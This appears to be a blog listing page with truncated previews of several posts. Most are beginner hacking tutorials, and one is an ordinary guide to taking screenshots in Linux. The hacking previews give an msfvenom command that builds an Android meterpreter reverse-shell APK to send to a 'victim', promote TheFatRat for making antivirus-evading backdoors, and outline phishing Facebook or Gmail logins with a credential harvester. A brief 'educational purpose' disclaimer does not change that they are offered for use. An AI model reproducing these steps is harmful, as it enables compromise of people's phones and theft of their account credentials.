Posts

How To Hack Android Phones Using Kali Linux 2018

If you want to learn to hack android phone, then this article is for you guys! And do not worry if you beginner, I'll show you step by step . Just make sure to read the full article. Warning:- This Hack is to educate you, this only for Educational Purpose. Don’t try to do any illegal stuffs. Requirements: 1. Kali Linux installed. 2. An Android phone.   STEPS   1. Open Terminal in Kali Linux. 2.We'll use MSFVENOM to create a malicious apk file which is to be installed on the victims android phone. 3.Paste the command, msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.xx.xx R> root/techcsnerd.apk   make sure to replace "1792.168.xx.xx" to your own local IP address.    4. Now open the root folder and send the techcsnerd.apk to the victim. 5. Open a new terminal and enter “msfconsole.” 6. After opening Metasploit console type these following commands which  are used to create payload handler which will create...

How to install TheFatRat on Kali Linux To make a Backdoor with FatRat

Image
Hello guys, once again I'm back with new topic "TheFatRat". If you don't know what actually FatRat is then this article may be helpful for you. What is FatRat???  ------>  An easy tool to generate backdoor and easy tool to post exploitation attack like browser attack,dll . This tool compiles a malware with popular payload and then the compiled malware can be execute on windows, android, mac . The malware that created with this tool also have an ability to bypass most AV software protection . (source: Github)   TheFatRat home screen   Some key Features of TheFatRat: Create backdoor for windows , linux , mac and android bypass antivirus backdoorr Checks for metasploit service and starts if not present Easily craft meterpreter reverse_tcp payloads for Windows, Linux, Android and Mac and another Start multiple meterpreter reverse_tcp listners Fast Search in searchsploit Bypass AV File pumper Create backdoor with a...

How to Take Screenshot in Linux(All distros including Kali)

  Taking a screenshot on Linux isn't quite a s straightforward as it is on Windows or OS X.       This is because there is no universal screenshot utility installed in Linux. It is up to the distribution to include a screenshot function.   Luckily, most do include at least one program that can take a screenshot, and there are more available if you don't have one installed.    Using  Gnome Screenshot:   The PrtScn key does not work as a shortcut in all Linux distributions, but it works in most GNOME desktop environments such as Ubuntu and Linux Mint. If this section doesn't work, try one of the following methods. 1. Press . PrtScn to take a full-screen screenshot. The screenshot will show everything in your display. You will be prompted to select where you would like to save the screenshot file. The Print Screen key is located at the top of the keyboard, usual...

How you can Hack Facebook/gmail,etc ( Using Social Engneering Toolkit)

Image
Did you know, you can actually hack any facebook account just by using a fake webpage.  This method is so simple that anyone with little knowledge can use.  In this tutorial we will use Social Engineering toolkit i.e Credential Harvester attack in kali linux. All you need to do is follow the tutorial as it is to see the Credentials Harvester into the action. Basic Blueprint of our Hack 1. Create a fake facebook/gmail login page. 2. Send this page's link to your victim and make your victim to login facebook/gmail from your page. In other words, this is called Social Engineering Attack. This social engineering attack is all about how you make your victim to do all the stuffs.     3. When the your victim login you'll get her/his username and password     Prerequisite: 1. A computer with kali linux or any other linux distro either in virtual machine or real machine. 2. And nothing more...... So, let's get started Make sure to follow the...